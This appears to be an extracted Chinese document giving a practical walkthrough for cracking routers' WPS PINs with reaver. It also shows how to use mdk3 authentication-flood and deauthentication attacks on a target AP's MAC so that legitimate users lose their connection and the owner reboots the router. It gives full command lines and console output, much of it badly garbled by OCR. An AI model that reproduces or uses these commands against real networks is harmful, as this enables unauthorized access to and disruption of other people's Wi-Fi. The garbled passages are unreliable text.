PIN死循环解决方法及mdk3攻击模式详解.doc
10页
破解WPA时,PIN出现死循环处理方法如下面这个例子,一开始,或者破解一段时间后出来PIN无限循环:个人心得对一个ap刚开始pin的时候打开-vv参数,如果顺利,就中断,然后改成-v继续pin,反正进度是可以保存的reaver-imon0-bxx:xx:xx:xx:xx:xx-d0-vv-a-S如果一直pin不动,尝试加-N参数reaver-imonO-bxx:xx:xx:xx:xx:xx-d0-vv-a-SNAP洪水攻击1、打气筒mdk3攻击模式操作方法首先检测网卡:ifconfig-a然后模拟端口:airmon-ngstartwlan0接下来用:airodump-ngmon0扫描ap找到你pin死的路由器mac用mdk3做身份验证攻击mdk3monOa-amac(被pin死的路由器的mac)身份验证攻击效果说明:此攻击是针对无线AP的洪水攻击,又叫做身份验证攻击其原理就是向AP发动大量的虚假的链接请求,这种请求数量一旦超过了无线AP所能承受的范围,AP就会自动断开现有链接,使合法用户无法使用无线网络迫使路由主人重启路由器说明:此命令功能强大,使用错误会造成所有ap不能使用,请指定mac地址,然后使用,其余命令不要乱试。
你要使用此命令的其他参数,请详细阅读此命令参数详解2、CDlinuxmdk3攻击模式操作方法首先进入,打开水滴或者打气筒搜索死的地址(直接打开螃蟹或者驱动搜索无线地址也)然后点击左下角图标,依次打开无线安全启动程厚…J络端文件管理器心网络浏览器i£S心办公廟附件.-图形图像•网第加密方蛊EC:17:2F>/WPA214:E6:E4:选摄「已卩la^-ng2replayn^j3replay-ng4replaynci5CDwpatty-4L6业niff网络暝探EttEfcapFeedingBottleInflaterWIo亠macchangerMACIB改AtfWj唱mdk3--Awywlnri-卸伽p7^||伸-f&glXHydra-关于CDlinux关于负已kiEmet-2010-RImdk3monOa-p40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3monOa-d40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3mon0a-f40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3mon0a-g40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)mdk3mon0a-a40:16:9F:**:2C:B2(40:16:9F:**:2C:B2为你pin死的路由的MAC,注意空格和大小写)主要命令进入后输入命令为你死的路由的,注意空格和大小写)-Buthentiuati□门DoSmod已Sendsauthentiuationframestoal1APsfoundinrange+ToomuchclientsfreezeorresetsomeAF's+P-BasicprcibinyandESSIDE;广uteforcemodeProbesAF'andcheckforanswerzusefulforcheckingifSSIDhasbeencorrecthjdeclockedorifAF'isinyouradaptorssendingrangeSSIDBruteforcingisalsopossibleuiiththistestmod已+d-DeautKentication/DisassociationAniokModeKickseverybodyfoundfromAF'm-Michaelshutdownexploitation仃KIP)Cancelsdl1trafficconti门x-802+IXtestsuj-WIDS/WIPSConfusionConfuse/AbuseI门tFusionDetectionandPreventionSystemsf-MACfilterbruteforcemodeThist已stusesalistof'knDwnclientMACAdressesandtries日uthenticat已thenitoth已givenAF'whiledynaniicallychangingitsresponsetime匚iutforbest.perforniance+ItcurrentlyworksonlyonAPswhocl已门!janop已门auth已门ticationrequestproperlyy-lilF'ADowngradesh-4+l;.d&authentic-^tesStationsandAF'ssendingI.JPA已ncryptedpackets*kliththiscancheckifthe:sysadniinwi11settinghis囂G:9F:謳牌醪nionOH回车后进入攻击模式,时间不要太长,最多半分钟就可以关闭对话框然后重新扫描网络看不是已经不在了。
等待主人重启吧死的路由是imdk3-vfiAP:40:16:9F:ConnectingC^enf:67t^':69:75^1:FFAP40:16:3F:Connec.ting'.CWentf4B:3&:61:D&:55:BlConnetting^t1ient;AA:FAi06:24:E2;06Connecting.:JClient:01:96:17:94:SAi'0'0AP40:16:9F#:2C:B2seeA^tobeINVULNERABLE!Deuiceii11fespondingwithConnectingClient:C7:51:E4:B7:旺燈?totargetAP:4Cf:16:9F:ConnectingElienf:B5:6D:32i.'C4:FF:^StotargetAP:4^16:9F:AP40:16:3F»2C:B2;Seei^tobeINVULNERABLE!Beyitje话•欽賣1respondingwith10clientsconnected!Connectingf:t1ient^45;FC:25-:7^3C:D9totargetAP:4C^16:9F:Connecting'llient:7J:DD:£4:5C:OC:1EtotargetAP:4(>;16:9F:Connectingentf1Z:99:7E:71:B5:DDtotargetAP:40;16:9F:AP40:16:8F®:2C:B2'^emstobeINVULNERABLE!Device.stTl1;resporidingwith1500.'clle越connected!Connecting£lientiSO:9E:65:67^71:88totargetAP:40:16:9FConnecting-Client^6E:B4:66:9E:AB:3DtotargetAP:4(lll6:9F:Connecting'CLentfED:P^:1S:8F:A8£Q^totargetAP:4Q:16:9F:Connectingulient:Packetssent:203^2CiB2.is-responding!targettargettargettargetAP^40:16:9F:APf4舸饪:9F:APf'4O:16:9F:5Wclientsconnected!istobeINVULNERABLE!rB2sporidingwithients>?connected!:9C:ES^CAtotargetAPi'40:16:9Fd:19(>"p^ckeb^/sec|可以在这里启动命令输入框管理器]ftq口宜,口14:42|爭运行程序*.器凶辔端摸拟器文件管理器邮件阅读器®网谿浏览器缚歸程品-超级用户揍式可能达到迫使重启目的,信号越强,效果越佳。
机器配置),稍停在进行攻击,连续攻击三意:只有客户端时进行攻每次攻击最好不超冕重命容否则卡死立该就可以了!5:彳|3ThunarReaverInflator1.0Home屏幕亮度调节tartNetWork瞻讯topNetWorkWPSCrackGUl立性至统一rninidwep-g(.k8C210Apin重码或者pin死路由器的解决办法(我验证貌似有效)看看我重码拼死后,的时候2reaverminidwep-gtk[+]SendingI.ISL:NACk:「I]JjF'E门苗厂:tj门门Fq_i]i=!rl(code:[+]叶yingpin営里21昶[+][+][+][+][+][+][+][+][+][+][+]世!j.Tng'而—3廻[:][+][+][+]SendingEAF'OL-requestE已匚:已it已did已门tit!』广已qu已运tSendingide门tit!』responseReceivedMlmessageSendingM2messageReceivedM3messageSendingM4messageE已匚:已it已dM5m已ssag已SendingMBmessageReceivedWSCNACKSendingSendingLhhlVSThF:IrequestE已匚:已it已did已门tit!』广已qu已运tSendingide门tit!』responseReceivedMlmessageSendingM2message-tirneoutoccurred厂(cod已:0::<02).r广已一t广拼死路由器后,整整一晚上没有在找到这个信号,今天起床在看,发现又出来了,继续拼,发现,重码非常非常的严重今天中午放弃次今晚在小试一下加了参数后大减少重码坚持就是胜利往下看。
Attack[上mima门di::m:E=tthe:opti□门乞曰口口山自门上匕|已1匸山.|.「hiithoutIreawer-imon2-bSC:21:0A:79:/'-a-c6-e"TP-LINK_79r'••_-S-w-S-n[!]liiPSsactionfailed(code:0x03)zr-e-tr-yinglastpin[+]Tryingpin37318840[+]SendingEAF'OLSTARTrequest[+]Receivedidentityr。
